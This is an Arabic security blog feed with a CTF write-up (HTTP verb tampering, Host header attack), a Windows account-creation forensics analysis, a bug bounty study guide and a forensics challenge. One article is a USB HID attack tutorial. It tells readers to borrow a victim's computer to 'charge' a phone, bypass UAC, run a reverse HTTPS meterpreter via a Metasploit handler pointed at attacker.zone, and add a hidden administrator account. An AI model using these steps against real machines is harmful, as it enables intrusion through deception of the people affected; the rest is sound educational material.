Quantcast
Channel: مجتمع الحماية العربي
Viewing all 61 articles
Browse latest View live

شرح تحدي تخطي ال Basic Authentication للمجلدات المحمية بـ htaccess

$
0
0

spionageausstellung-top-secret-oberhausen-ruhrgebiet

السلام عليكم ورحمة الله وبركاتة

كنت مشاركا في الفريق المنظم لمسابقة CTF(Capture The Flag) في مؤتمر Cairo Security Camp لهذا العام

وقمت بمشاركة التحدي Online حتي يتمكن الجميع من المشاركة .. واليوم هنا ان شاء الله سأقوم بشرح التحدي وطريقة الحل.

فكرة المسابقة[فكرة خيالية]:

وكالة المخابرات الروسية أعلنت عن مسابقة لتوظيف الهكرز للعمل لديها

فقامت بعمل موقع إلكتروني وطلبت من الهكرز تخطي ال Basic Authentication الخاصة بلوحة تحكم الموقع .. اذا إستطعت ان تجد لوحة التحكم وتتخطي ال Basic Authentication فستقابلك لوحة تحكم اخري مصرح بدخولها فقط لمن هم في الشبكة الداخلية للوكالة ولا يسمح لمن هم خارج الوكالة بالدخول إلي لوحة التحكم هذه.

فكيف ستتخطي كل هذه الحواجز إلي أن تصل إلي الشفرة المطلوبة؟

المطلوب بالترتيب:
١- أوجد مسار لوحة تحكم مدير الموقع (لن ينفعك التخمين)
٢- قم بتخطي ال basic authentication الموجوده عليها
٣- اذا استطعت عبور الاولي فستجد لوحة تحكم اخري وعليها أيضا basic authentication وغير مصرح بدخولها إلا لمن هم علي نفس الشبكة الداخلية للوكالة  .. اذا إستطعت تخطيها فستحصل مباشرة علي الKey

نبدأ بالحل ..

عند دخولك الي صفحة التحدي ستجد شكل الصفحه كالآتي:

Screen Shot 2014-12-12 at 10.10.12 PM

الآن سنستخدم ال Exif لتحليل الصورة المدرجة داخل الموقع لنري ما هي البيانات التي تحتويها هذه الصورة؟

EXIF

. وهو اختصار لــ Exchangeable Image File حيث يمكننا من قراءة ال Metadata والبيانات الاخري التي تحتويها الصور مثل متي وأين وكيف إلتقطت الصورة وبيانات اخري.

هناك موقع يسمح لك بعمل ذلك بدون تنزيل أي أدوات .. علي الرابط التالي:

http://regex.info/exif.cgi

الآن ننسخ رابط الصورة ونضعه بالموقع المذكور وسنجد البيانات التالية:

Screen Shot 2014-12-12 at 10.15.08 PM

هل تري؟ داخل ال “User Comment:” يوجد كود طويل مشفر بال Hex لنحاول أن نفك هذا الكود .. وهذا كان ال string الذي خرج لنا عند محاولة فك الكود:

Spasiba moy drog, Kake bofera :D check below dir s3cr3tDIR/

اذا لوحة التحكم هي علي الرابط التالي كما هو واضح بالأعلي:

s3cr3tDIR/

عند محاولة الدخول إلي تلك اللوحة ظهرت لنا Basic Authentication تطلب منا إدخال username & password .. فكيف يمكننا تخطيها؟

basic

حسنا .. لنفهم كيف يتم عمل Basic Authentication بال htaccess فتعالو نبحث في جوجل عن كيفية عمل ذلك (المقصد من البحث هو ان تري عدة أمثلة) .. وقد وجدنا الكود التالي:

AuthUserFile /usr/local/htpasswd/.htpasswd
AuthGroupFile /dev/null
AuthName “Please enter password”
AuthType Basic
< Limit GET POST>
require valid-user
< /Limit>

ما نفهمه من الكود بالأعلي هو ان ملف ال htaccess سيقوم بحماية المجلد في حالة ما اذا قام المستخدم بفتح المجلد من خلال GET or POST request! وهي طريقه غير آمنة في حماية المجلدات لأن المستخدم إستخدم طريقة Limit لتحديد من يطلبون الموقع بواسطة طلبات من نوع GET أو POST

حيث انه اذا قام المستخدم بإرسال طلب للصفحه باي طريقه غير GET or POST فانه سيتخطي هذه الحماية!!

وهي تقنية معروفة بإسم HTTP Verb Tampering

إضغط هنا لتشاهد فيديو يشرح مزيد من المعلومات حولها.. والآن لنكمل.

الآن نقوم بزيارة الصفحة ونقوم بتعديل طريقة طلب الصفحه من GET الي اي شئ .. مثلا LOL:
Screen Shot 2014-12-12 at 11.36.23 PM

كما ترون بالأعلي قمت بتعديل طريقة ال Request لتصبح LOL بدلا من GET وخرج لي المحتوي التالي:
Screen Shot 2014-12-12 at 11.45.25 PM

ال response تقول بأن الصفحه غير موجودة! 404 Page not found

لكن هل لفت انتباهك ذلك الجزأ الذي في أسفل الصفحة باللون الأخضر وقد تم عمل تعليق(comment) له?

ممتاز .. إذا وصلنا للوحة الأدمن الأخيرة علي المسار التالي: sup3rFlag/ .. وعليها أيضا Basic Authentication! .. ولكن لحظة .. كيف سيمكننا تخطيها في حين أنها مسموح دخولها فقط لمن هم علي نفس الشبكة الداخلية للوكالة؟

كما هو واضح من الوصف المرفق مع التحدي أن لوحة التحكم الأخيرة موجودة علي الشبكة الداخلية للوكالة .. في الوضع الطبيعي إذا كنت تستخدم وندوز وقمت بتطبيق الأمر ipconfig أو علي لينوكس وقمت بتطبيق الأمر ifconfig فسيظهر لك ال IP الخاص بك علي شبكتك المحلية .. ولنفترض أنه 192.168.1.233 إذا فلو أنك علي الشبكة الداخلية للوكالة فإن الآيبي الخاص بلوحة التحكم سيكون داخل نفس النطاق .. يعني

192.168.1.2

رائع .. إذا سنقوم بتطبيق نفس السيناريو هنا علي التحديث اللذي لدينا .. كيف سيمكننا عمل Request لموقع داخل الشبكة الخاصة بموقع الوكالة؟!

الأمر هنا يعتمد علي نوع من الثغرات يسمي Host Header Attack

لن اطيل في الشرح عنه هنا لأني سأكتب عنه موضوع مفصل ان شاء الله .. لكن سأذكر هنا أن من ضمن إستغلالات هذا النوع من الثغرات هو إمكاينة طلب موقع علي الشبكة المحلية/الداخلية للموقع الأصلي

يعني مثلا لو أن الموقع site.com موجود علي سرفر ما .. وال IP الداخلي لهذا الموقع هو 192.168.1.155

وهذا الموقع مصاب بثغرة Host Header Attack فإنني يمكنني طلب الموقع الموجود علي الآيبي 192.168.1.154 لأنه علي نفس شبكة الموقع المصاب.

الطريقة ببساطة هي عمل طلب للموقع Request بأي طريقة سواء GET أو POST مع التعديل في ال Headers بإستبدال خانة ال Host بالآيبي الداخلي الذي نريد الإطلاع عليه, الموضوع يعتمد علي مشكلة في سرفرات ال Apache نفسها.

If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. As such, it’s possible to pass requests with arbitrary host headers directly to a sizable number of applications

وبهذه الطريقة إستطعنا الحصول علي ال Key الخاص بالتحدي :-)

The flag is: 607fc5e8ce2abfc66fb55b3914a6b5f1

شكرا لمتابعتكم.


تحليل جنائي لإكتشاف الفرق بين إضافة مستخدم من قبل CLI أو GUI

$
0
0

الفكرة لهذه التدوينة جائت بعد أن قام أحد المتابعين (azeemnow) لـ #DFIR على تويتر بطرح السؤال حول كيف يمكننا أن نعرف هل قام المُخترق بإضافة مستخدم على نظام ويندوز من CLI أم من GUI؟

حاولت بالبداية أن أطرح عليه بعض الحلول ولكن على ما يبدو لم تنفعه كثيراً. هنا قلت لنفسي لما لا أقوم بعمل الخطوات نفسها وأرى بنفسي مالذي يمكنني التوصل له، وهذا ما فعلت!

الخطوات التي قمت بها ولكن ليست بالترتيب المذكور وذلك لكي أخلق لك عزيزي القاريء جو من التشويق والتجربة بنفسك، هي:
1- قمت بتشغيل cmd.exe بصلاحيات Administrator وقمت بتنفيذ الأمر الذي بالأسفل لإضافة مستخدم جديد سميته cmduser وكلمة السر له هي cmduser كذلك:
net user cmduser cmduser /add

2- بعد ذلك ذهبت الى لوحة التحكم (Control Panel) في نظام الويندوز ومن ثم الى User Account ومن هناك قمت بإضافة مستخدم أسميته guiuser.

الآن الفكرة التي كانت في مخيلتي هي إنه يمكنني من خلال تتبع السجلات الخاصة بالنظام (system logs) أن أحصل على أدلة كافية تقودني للتفريق بين المستخدم الذي تم عمله من سطر الأوامر وبين المستخدم الذي تم عمله من داخل لوحة تحكم النظام، لكن للأسف تبيين إنه لا يمكن معرفة ذلك بهذه الطريقة! فبعد أن أطلعت على السجلات، تبيين إنه لا فرق بتاتاً بين كلا العمليتين سوى التاريخ، وبدون شك إسم المستخدم :) حيث في برنامج عرض الأحداث (Event Viewer)، قام النظام بتسجيل الحدث رقم 4720 والذي يعني “إنشاء حساب مستخدم جديد” (A user account was created) لكلا الحالتين. وكما أسلفت، لكي لا تعرف عزيزي القاريء أيهما تم إنشاءه أولاً، فإنه المستخدم الأول (بغض النظر عن إسمه حالياً) تم إنشاءه بتاريخ 1/7/2014 4:40:02 pm بينما المستخدم الثاني تم إنشاءه بتاريخ 1/7/2015 4:40:30 pm.

صديقنا azeemnow كان قد عمل ما يسمى بـ super timeline وذلك لتوضيح تواريخ الأحداث وترتيبها “تسلسلها”، ولكن هذا لم يجدي الكثير من النفع!

قمت بالتواصل والدردشة مع هارلان (keydet89)، أحد أفضل الكتاب بمجال التحليل الجنائي الالكتروني في نظام الويندوز وسألته عن الأمر، فأخبرني أن أبحث وأتأكد من ملفات الـ prefetch (المزيد عنه لاحقاً في تديونة آخرى) الخاصة بكل من net.exe و net1.exe وتاريخ آخر تنفيذ لهما. حيث إنهما سوف يظهران قبل بداية إضافة المستخدم من سطر الأوامر (cmd.exe) بقليل من الوقت (إلا لو قام المخترق بالعمد بتأخير الأمر). هنا قمت بعمل إستخراج لكلا الملفين (prefetch) بواسطة FTK Imager ومن ثم أستخدمت أداة بسيطة كتبت بلغة بايثون لـ جين مايكل (jmichel_p) وذلك لتحليل الـ prefetch الخاص بـ net.exe و net1.exe.

من خلال النتائج الخاصة بملف NET.EXE prefetch، تبيين التالي:
net-prefetchمن خلال النتائج الخاصة بملف NET1.EXE prefetch، تبيين التالي:
net1-prefetch

الآن بعد القيام بربط الأحداث مع بعضها البعض:
1- نتائج الأحداث (السجلات)
2- نتائج ملفات Prefetch

يمكننا أن نفترض بإنه المستخدم الذي تم إنشاءه بتاريخ 2015-01-07 14:40:02، هو المستخدم الذي تم إضافته من سطر الأوامر (cmd.exe).

الآن وماذا عن المستخدم الذي تم إنشاءه من لوحة التحكم؟ هنا أقترح علي هارلان أن أتحقق من مداخل الـ ShellBags (المزيد عنه لاحقاً في تديونة آخرى) الخاصة بالمستخدم الذي قام بعملية الإنشاء للحسابات. هنا قلت مع نفسي إن هذه أفضل فرصة لتجربة أداة أريك (EricRZimmerman) والتي قام بالإنتهاء منها قبل فترة ليسطة بعيدة أسماها ShellBagsExplorer. يمكن تحميلها من هنا.

قمت كذلك بعملية سحب الملف UsrClass.dat الخاص بالمستخدم الذي قام بعملية الإنشاء (لا تنسى عزيزي القاريء يمكن معرفة من قام بذلك من السجلات نفسهم) ومن ثم قمت بتحليله من خلال الأداة التي ذكرتها ShellBagsExplorer. الأداة سهلة الإستخدام ورائعة للغاية وأنصح كل من يهتم بمجال التحقيقات الجنائية الالكترونية أن يقوم بتجربتها. الأداة قامت بتسهيل كل شيء من خلال عرض النتائج على شكل شجيري، ومن هناك وجدت إن المستخدم قام بتشغيل لوحة التحكم ومن ثم لوحة إدارة المستخدمين (User Accounts) في تاريخ 1/7/2015 2:40:20 pm، كما هو مبيين في الصورة أدناه:
sbe1-useraccountsمن خلال ذهابه الى هذه اللوحة قام بالذهاب من هناك الى صفحة إدارة الحسابات (Manage Accounts) بتاريخ 1/7/2015 2:40:22 pm، كما هو مبيين بالصورة أدناه:
sbe2-manageaccounts
بعد ذلك قام المستخدم بتشغيل صفحة إضافة مستخدم جديد (Create New Account)، حيث قام هو/هي بإضافة الحساب بتاريخ 1/7/2015 2:40:30 pm، كما هو مبيين في الصورة أدناه:
sbe3-createuser

الآن بعد القيام بربط الأحداث مع بعضها البعض، كما فعلنا سابقاً:
1- الاحداث التي وجدناها في برنامج Events Viewer
2- الاحداث التي وجدناها في ShellBags Explorer
تثبت بإنه المستخدم الثاني الذي تم إنشاءه بتاريخ 1/7/2015 4:40:30 pm، هو المستخدم الذي تم عمله من خلال لوحة التحكم GUI وليس من سطر الأوامر CLI.

كذلك لو قمنا بعمل تحليل زمني (timeline) لجميع ما تم ذكره، فإنه يمكننا تأكيد ما تم ذكره بالأعلى، وذلك لأننا سوف نجد تسلسلهم الزمني وراء بعض.

هذا كل ما لدي في هذا الموضوع، وإن شاء الله نلتقي مع مواضيع آخرى في هذا المجال في القريب العاجل.

اختراق نظام Windows 8.1 بهجوم USB HID

$
0
0

مقدمة

من فترة طويلة و أنا أريد استخدام نظام Kali – NetHunter المعدل للعمل مع نظام أندرويد على عدة اجهزة (Nexus 4, 5, 7, 10, OnePlusOne) وسيتم دعم المزيد مستقبلا. توزيعة NetHunter تحمل في قلبها توزيعة Kali وتستطيع أن تعمل كل ما تعمله Kali. في نفس الوقت, هناك إضافات و تسهيلات جعلت الاختراق أسهل بكثير وهناك العديد قادم في هذه التوزيعة الواعدة من تطوير offensive-security. هجوم اليوم هو HID أو Human Interface Device عن طريق استغلال توصيل الهاتف المحمول بالكمبيوتر وهذا شائع جدا ويسهل عليك أن تطلب شحن هاتفك من أي أحد يملك جهاز كمبيورت وغالبا ستقابل ترحابا بكل سهولة.  هناك تطبيقات غير محدودة لهذا الهجوم وسنعرض اليوم إحداها.

 

الشرح سيكون على جهاز OnePlusOne لكنه يسري على جميع الاجهزة المدعومة

خطوات الاختراق

سأفترض مسبقا بأنك ملم بالمصطلحات التقنية التي ذكرت وسأتضطرق لتعريف الجديد منها في موضوعي.

1. تشغيل الأباتشي

اختر NetHunter Home Launcher

Applications

Applications

ثم اسحب الشاشة من اليسار إلى اليمين و اختر Kali Service Control

Kali Service Control

Kali Service Control

ثم فعل الأباتشي من القائمة

2. إعدادات هجوم الـ USB HID

سأحاول وضع الخطوات بشكل مفصل كي نستفيد منه في شروحات قادمة -إن شاء الله-

2.1. جعل أندرويد في USB Debugging mode

من قائمة البرامج, اذهب إلى

Settings >> Developer options >> Android debugging

Debugging Mode

Debugging Mode

 

2.2. وصل الهاتف بالجهاز المراد اختراقه

إذا تم التوصيل بنجاح ستجد تنبيه الـ Debugging mode في شريط تنبيهات الهاتف وبدونه لن تنجح عملية الاختراق

2.3. إعدادت الـ PowerSploit

مشروع الـ PowerSploit  واحد من أجمل المشاريع الموجودة على الساحة حاليا و يستخدم إمكانيات الـ PowerShell في اختراق الويندوز. تم استخدام أحد إمكانيات هذا المشروع في توزيعة NetHunter بشكل رائع.

هذا الاستغلال يسمح لك بتشغيل اتصال HTTPS عكسي على Metasploit meterpreter

هناك أربع إعدادات رئيسية

IP Address – LHOST : وهو عنوان الجهاز المشغل للميتاسبلويت handler سنتفترض أنه attacker.zone

Port – LPORT: وهو المنفذ الذي ينصت إليه الـ metasploit handler

Payload: وهنا أنت مخير بين الـ HTTP و HTTPS طبعا الأخير أفضل

URL to Payload : غاالبا يكون نفس عنوان الهاتف المحمول -لهذا قمنا بتفعيل الأباتشي سابقا- إلا إذا كنت قد أعدت الـ Payload في مكان أخر.

PowerSploit Settings

PowerSploit Settings

2.3.1. تخطي التحكم في صلاحيات المستخدم UAC

نقوم بهذه الخطوة كي نضمن تنفيذ الهجوم بأعلى صلاحيات ممكنة والتأكد من عدم منع النظام للهجوم من تنفيذ أوامر الـ PowerSploit

UAC Bypass

UAC Bypass

 

2.3.3. إعداد الميتاسبلويت وتنفيذ الهجوم

تشغيل الميتاسبلويت و الـ handler على الهاتف الجوال أو على الجهاز المحدد في جزء IP Address -LHOST  سابقا والذي سيتصل عليه الـ Reverse HTTPS meterpreter

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST attacker.zone
set LPORT 4444
run

وأخيرا تنفيذ الهجوم

Execute Attack

Execute Attack

 

2.4. إعدادت الـ Windows CMD

هنا نفس طريقة الهجوم السابقة -ونفس الخطوات عدا تشغيل الأباتشي- لكن ينفذ أوامر تقوم أنت بإعدادها مسبقا و يقوم بتنفيذها على جهاز الضحية بدلا من تشغيل Reverse HTTPS meterpreter shell.

مثلا سنضيف مستخدم جديد اسمه KING ونجعله في مجموعة المدراء Administrators. طبعا تستطيع تعديل و إضافة ما تشاء من أوامر

Windows CMD

Windows CMD

 

شخصيا منبهر من سهولة و خطورة الهجوم و كيف أصبح جوالك ألة اختراق متحركة و بأقل الخطوات

تحياتي واحترامي

كيف تبدأ طريقك في إكتشاف ثغرات المواقع وبرامج المكافآت المالية.

$
0
0

howto-header

السلام عليكم ورحمة الله وبركاته,

اليوم أكتب لكل الذين يريدون أن يبدأوا في مجال أمن المواقع أو بدأو فعليا لكنهم لم يجدوا الطريق الذي يسيرون عليه.

ملحوظه: لن اكتب عن كيف تبدأ في مجال أمن المعلومات بشكل عام لأنه متنوع بشكل كبير

Network Security, Malware Analysis, Systems Security, Forensics, Reverse Engineering, Incident Handling وغيرها

لكني سأكتب في المجال الذي فيه تخصصي وهو أمن تطبيقات المواقع Web Applications Security حتي يمكنني إيصال المعلومة بشكل سليم ليكون ان شاء الله دليل ومرجع لمن يريد أن يبدأ في مجال أمن مواقع الإنترنت وإكتشاف ثغراتها ويجني المال من ذلك :D

رجاءآ اعلم جيدا أخي ان الموضوع سيتطلب منك وقت وجهد ولن يأتي بين يوم وليلة, وهذا الموضوع هو بمثابة خريطة لك تسير عليها في الفترة القادمة حتي تصير في مستوي متقدم بإذن الله, يعني ضع لنفسك جدول انه في خلال الثلاثة أشهر أو الست أشهر القادمة علي حسب ترتيبك أنت, تكون أنهيت كل متطلبات هذا الموضوع.

الأجندة:

١- كيف تفهم مجال إدارة المواقع الإلكترونية ومصطلحاتها وتتمرن عليها جيدا.

٢- كيف تبدأ في التعرف علي أنواع ثغرات المواقع وتفهمها جيدا.

٣- ما هي الخطوات المطلوبه لكي تكون قادرا علي إكتشاف ثغرات المواقع بنفسك.

٤- كيف تجني المال من اكتشاف ثغرات المواقع.

Screen Shot 2015-03-28 at 4.31.30 AM

١- كيف تفهم مجال إدارة المواقع الإلكترونية ومصطلحاتها وتتمرن عليها جيدا؟

حسنا, لكي تبدأ في مجال أمن مواقع الإنترنت فيجب عليك أولا أن تفهم مجال إدارة مواقع الانترنت بشكل عام وكيف تعمل مواقع الإنترنت وما هي اللغات البرمجيه التي تستخدمها وماهي قاعدة البيانات وكيف تعمل وكيف يتم الربط بينها وبين التطبيقات(Applications) وغيرها من الأسئلة.

الموضوع سهل وبسيط إن شاء الله, سنقوم بتجربة عمل موقع إلكتروني وتشغيله كتدريب عملي علي كيف تعمل المواقع الإلكترونية وكيف تعمل قواعد البيانات وما هي ال Domains وغيرها.

المطلوب منك عزيزي القارئ أن تستخدم جوجل في البحث والقرآءة عن:

١- ما هي mysql وما هي phpmyadmin

٢- ما هو ال Appserv وكيف يمكن تثبيته (Install)

٣- ما هو ال WordPress وكيف يمكن تشغيله علي السيرفر المحلي Appserv

٤- كيف تقوم بحجز مساحة إستضافة مجانية و domain مجاني وتقوم بتشغيل ال WordPress عليها

٥- ما هو سكربت Vbulletin وكيف تقوم بتركيبه علي إستضافة مجانية أو علي ال Appserv

٦- مطلوب منك أن تقرأ جيدا عن ال HTML وتقوم بتصميم صفحات بها حتي تتمرن عليها جيدا وهي لغة سهله جدا ويمكن تعلمها في وقت قصير لكنك لن تدرك مدي سعادتك وأنت تجرب إنشاء صفحتك الخاصه وتضعها علي موقعك علي الإنترنت للمره الاولي :)

أنصحكم بمتابعة الكورس التالي بخصوص لغة ال HTML

٧- الآن جاء دور لغة البرمجة PHP وليس مطلوب منك أن تكون محترف فيها بل أن تعلم أساسيات اللغة سيكون كافيا لك لتبدأ في مجال أمن المعلومات, وحتي لا تتعب في البحث, إليك الكورس التالي وهو كورس مجاني ورائع وكافي أيضا للمبتدأين في لغة البرمجة PHP

 

#شكرا أخونا يوسف إسماعيل علي هذه الكورسات المميزة.

٨- يمكنكم أيضا ( بشكل إختياري) مشاهدة بعض الدروس (١٠ مثلا) من هذا الكورس الذي يشرح ال JavaScript باللغة العربية وهي لغة مفيدة جدا في مجال إكتشاف ثغرات المواقع:

إن شاء الله بعد إنهاء هذه الخطوات أضمن لك تماما أنك ستفهم جيدا كيف تعمل مواقع الإنترنت وما هي قواعد البيانات وكيف يتم إدارتها وربطها بالتطبيقات المختلفة وستتعلم كيف تقوم بإنشاء موقع علي الإنترنت وتقوم بإدارته وستعرف جيدا أغلب المصطلحات المنتشرة في هذا المجال وستفهم لغات البرمجة وكيف تعمل.

٢- كيف تبدأ في التعرف علي أنواع ثغرات المواقع وتفهمها جيدا؟

سأفترض بأنك قمت بعمل الخطوات السابقه والآن أصبحت لديك القدرة لفهم باقي ما سيتم كتابته لأنه لا أحد يصعد السلم ويبدأ من الدرجة السادسه!

owasp-logo0

حسنا الآن أصبحت لديك خلفية عن لغة البرمجة PHP وكيف تعمل, للتعرف علي ثغرات المواقع وما هي وكيف تصاب المواقع بهذه الأنواع من الثغرات, فعليك أن تجعل مرجعك في ذلك هو موقع owasp.org وهو الموقع المصنف الأول عالميا في شرح ثغرات ال Web Applications وتصنيف أخطر الثغرات لكل عام.

https://www.owasp.org/index.php/Top_10_2013-Top_10

الرابط الذي بالأعلي يحتوي علي أخطر عشر ثغرات تصاب بها تطبيقات الإنترنت (Web Applications) ويشرح كل ثغرة تفصيلا وكيف يتم اكتشافها واستغلالها فقط قم بالضغط علي إسم الثغره وستظهر لك تفاصيلها بالكامل.

مراجع اخري عن ثغرات المواقع وباللغة العربية:

الكورس بالأعلي يشرح أخطر عشر ثغرات تصيب مواقع الانترنت والكورس باللغة العربية.

شرح ثغرات Unvalidated Redirects وتطبيقها علي موقع Kaspersky

شرح ثغرات Cross Site Scripting

شرح ثغرات SQL injection

والرابط التالي هو لكورس ممتاز يشرح وبالتفصيل جميع أنواع ثغرات ال  SQL Injection من البداية وحتي مستوي الإحتراف إن شاء الله.

https://www.youtube.com/playlist?list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro

٣- ما هي الخطوات المطلوبة لكي تكون قادرا علي إكتشاف ثغرات المواقع بنفسك؟

لكي تتعلم كيف تكتشف ثغرات المواقع بنفسك ويصبح الموضوع سهل بالنسبة إليك, عليك تطبيق هذه الثغرات كثيرا, والموضوع بسيط, هناك تطبيقات كثيره تم برمجتها خصيصا لكي يقوم الدارسين بالتعلم عليها وتجربة الثغرات الموجودة فيها, مثال ذلك قم بتنصيب ال Application المسمي DVWA علي ال Appserv علي جهازك ثم قم بتطبيق المتطلبات التالية:

١- قم بإكتشاف وإستغلال الثغرات الموجوده في هذا التطبيق في حالة ما اذا كان مستوي الحماية فيه ضعيف

٢- نفس الشئ بالأعلي ولكن قم بتطبيقه في حالة اذا كان مستوي الحماية متوسط

يمكنك أيضا التجربة وإكتشاف الثغرت في هذه المواقع المعدة أيضا لنفس الغرض والمصابة بالعديد من أنواع الثغرات:

http://testphp.vulnweb.com

https://xss-game.appspot.com

لا مانع من المساعدة بواسطة البحث في جوجل أو حتي رؤية فيديوهات تشرح لك كيف تكتشف وتستغل ثغرات هذا التطبيق فأنت في مرحلة التعلم وعليك اللجوء إلي جميع المصادر المتاحة لتتعلم جيدا :)

والآن بقيت لنا المرحلة الأخيرة.

Screen Shot 2015-04-03 at 2.15.00 AM

٤- كيف تجني المال من اكتشاف ثغرات المواقع؟

 هناك عدة مواقع تدير برامج تسمي Bug Bounty Programs يعني برامج المكافآت المالية, ويمكن من خلال هذه المواقع البحث ومشاهدة ما هي المواقع التي تسمح لك بالبحث عن ثغرات داخلها ومن ثم إبلاغ تلك المواقع عن ثغراتهم ليقومو بترقيع تلك الثغرات, وفي المقابل ستحصل علي مكفأه مالية مقابل إكتشافك :D

هذه المواقع مثل:

https://hackerone.com/programs

و

https://bugcrowd.com/list-of-bug-bounty-programs

فإذا ذهبنا مثلا للموقع الأول فإنك ستجد المواقع معدة بالشكل التالي:

Screen Shot 2015-04-03 at 3.02.57 AM

 

إسم الموقع الذي يسمح لك بإكتشاف ثغرات لديه, وأقل مبلغ يدفعونه علي الثغرات التي يتم إكتشافها عندهم

عند الضغط علي اسم اي موقع من هذه المواقع ستجد تفاصيل أكثر توضح ما هي Web Applications او النطاقات التي يسمح لك الموقع بالبحث فيها, وما هي أنواع الثغرات التي يقبلونها, وما هو أقل مبلغ وأعلي مبلغ يدفعونه مقابل إكتشافك لثغرات لديهم والمزيد عن الموقع وما يقدمه من خدمات للباحثين الأمنيين.

فمثلا لو إكتشفت ثغره من نوع XSS في موقع الياهو فإنك ستحصل علي مكافأه تتراوح ما بين 50 إلي 500 دولار للثغره الواحده! وتتزايد المكافآت المالية بشكل رهيب في حالة إكتشاف ثغرات أعلي في الخطورة مثل ثغرات ال SQL Injection, Remote Code Execution, Authentication Bypass وغيرها.

أنصحكم بإنشاء حساب علي موقع Hackerone.com وأخذ جولة في الصفحه المدرجه بالأعلي لتعرفوا المزيد والمزيد عن ال Bug Bounty Programs وكيف يتم المساهمة فيها.

وينطبق نفس المثال بالأعلي علي الموقع الثاني المدرج أعلاه.

روابط مهمة:

http://www.exploit-db.com

http://www.securitytube.net

http://www.thehackernews.com

كتب مهمة:

1- OWASP Testing Guidehttps://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf

الكتاب بالأعلي يحتوي علي شرح تفصيلي وبالأمثلة لجميع أنواع ثغرات تطبيقات الإنترنت (Web Applications) وكيف يتم إكتشاف تلك الثغرات والأدوات اللازمة لذلك.

2-  Web apps hackers handbook  – كتاب رائع لكن ليس مجاني

3- SQL injection attacks and defensehttp://adrem.ua.ac.be/sites/adrem.ua.ac.be/files/sqlinjbook.pdf

الكتاب بالأعلي هو مرجع شامل لثغرات ال SQL Injection كيف تحدث وكيف يتم إستغلالها وكيف يتم ترقيعها في الكود البرمجي للموقع.

كورسات:

تعلم لغة البرمجة Python

هذا الكورس من الكورسات الرائعة وباللغة العربية يشرح لغة البرمجة Python من خلال سلسلة من الدروس.

https://www.cybrary.it/course/ethical-hacking/Penetration Testing and Ethical Hacking

من الكورسات الرائعه في مجال إختبار الإختراق وإكتشاف الثغرات وهو كورس مجاني.

Web Application Pentestinghttp://www.pentesteracademy.com/course?id=5

من الكورسات الرائعة والشاملة في مجال إكتشاف ثغرات المواقع لكنه ليس مجاني.

 أدوات مهمة:

من الأدوات المهمة التي ستحتاج أن تعرفها وتقرأ عنها وعن كيفية إستخدامها وتجربها إن أمكن, فهي تسهل عليك الكثير في إكتشاف وإستغلال ثغرات المواقع:

١- Acunetix

2- NetSparker

3- BurpSuite

4- Havij

إلي هنا أحبتي ينتهي هذا الموضوع, أرجو أن يكون مرجع للبادئين والمتوسطين في مجال أمن تطبيقات المواقع Web Applications Security Researchers وأن يتقبله الله عز وجل عملا خالصا لوجهه.

في حالة وجود أي إستفسار او طلب برجاء إصافته كتعليق comment هنا في نفس الموضوع لربما شخص أخر لديه نفس سؤالك فيتم الإجابة علي الجميع إن شاء الله.

شكرا للأشخاص الذين شاركوا في هذا الموضوع بالتعديل والإقتراحات:

أحمد حسن أبوالعلا, محمد عبدالعاطي, ياسر علي

#إن شاء الله سيتم تحديث الموضوع بشكل دوري.

تحدي: تحقيق جنائي ألكتروني رقم (1)

$
0
0

في البداية رمضان مبارك على الجميع، وأدعوا الله أن يعيننا على صيامه وقيامه، وأن يغفر لنا جميع ذنوبنا.

قررنا في مجتمع الحماية العربي، عمل مسابقة أسبوعية خلال شهر رمضان المبارك، وتكون عبارة عن جريمة ألكترونية بسيطة وعليكم بالقيام بحل القضية وذلك بهدف زيادة الوعي في مجال التحقيقات الجنائية الالكترونية. المسابقات سوف تبدأ بقضية بسيطة، وبعد ذلك تتعقد شيئاً فشيئاً. خلال عملك في حل كل قضية سوف تكتسب خبرة ولو بسيطة في جانب من جوانب التحقيقات الجنائية الالكترونية وبإستخدام أداوت بسيطة ومتوفرة للجميع. على بركة الله نبدأ القضية الأولى، ولديكم أسبوع واحد من الآن لحل القضية.

ملاحظة: إن كانت لديك أفكار لجرائم ممكن يتم تحويلها الى قضايا للدراسة والإستفادة العلمية والتقنية منها، فلا تترددوا إما بإرسالها لنا وسيتم نشرها بإسمكم أو بالتواصل معنا لعملها لبقية زوار ومتابعي الموقع والإستفادة من الأفكار التي فيها.

التحدي رقم (1) – السيناريو:
أنت تعمل كمحقق جنائي ألكتروني وشركة S4A أتصلت بك لتقوم بعملية التحقيق على قرص صلب (Hard disk) لموظف مشتبه به يعمل لديهم. قبل أن تصل الى موقع الشركة، قام الموظف بعملية تخريب للقرص الصلب. مع العملية التي قام بها الموظف، أصبحت أنت مجبر على العمل على القضية بوجود هذه الظروف التقنية. دورك كمحقق هو أن تقوم بعملية إصلاح لجدول الأقسام للقرص الصلب (Harddisk Partition Table) وذلك لكي تتمكن من الوصول الى أي من البيانات التي قام بإخفائها الموظف.

الأدلة الجنائية التي معك هي: S4ADFChallenge1.7z، بداخله نسخة عن القرص الصلب تم أخذها منا هي. (كلمة المرور للملف هي: security4arabsRM2All)

في ختام التحقيق الذي قمت به، عليك تزويدنا بتقرير يحتوي على ما يلي:
1- عدد الأقسام الموجودة على القرص
2- ما هي الملفات المثيرة والمهمة التي أستطعت إيجادها
3- ما هي المنهجية التي أتبعتها للوصول الى الى الحل النهائي
4- ما هي فرضيتك حول ما قام به المشتبه به ولماذا
5- هل تمكنت من الوصول الى العلم (Flag) لهذا التحدي؟ وماذا كان محتوى العلم؟

أدوات ممكن تساعدك في التحليل هي: FTK Imager, PhotoRec, 7zip، وأي محرر لـ Hex

بالتوفيق، ورمضان مبارك على الجميع

تحدي: تحقيق جنائي ألكتروني رقم (2)

$
0
0

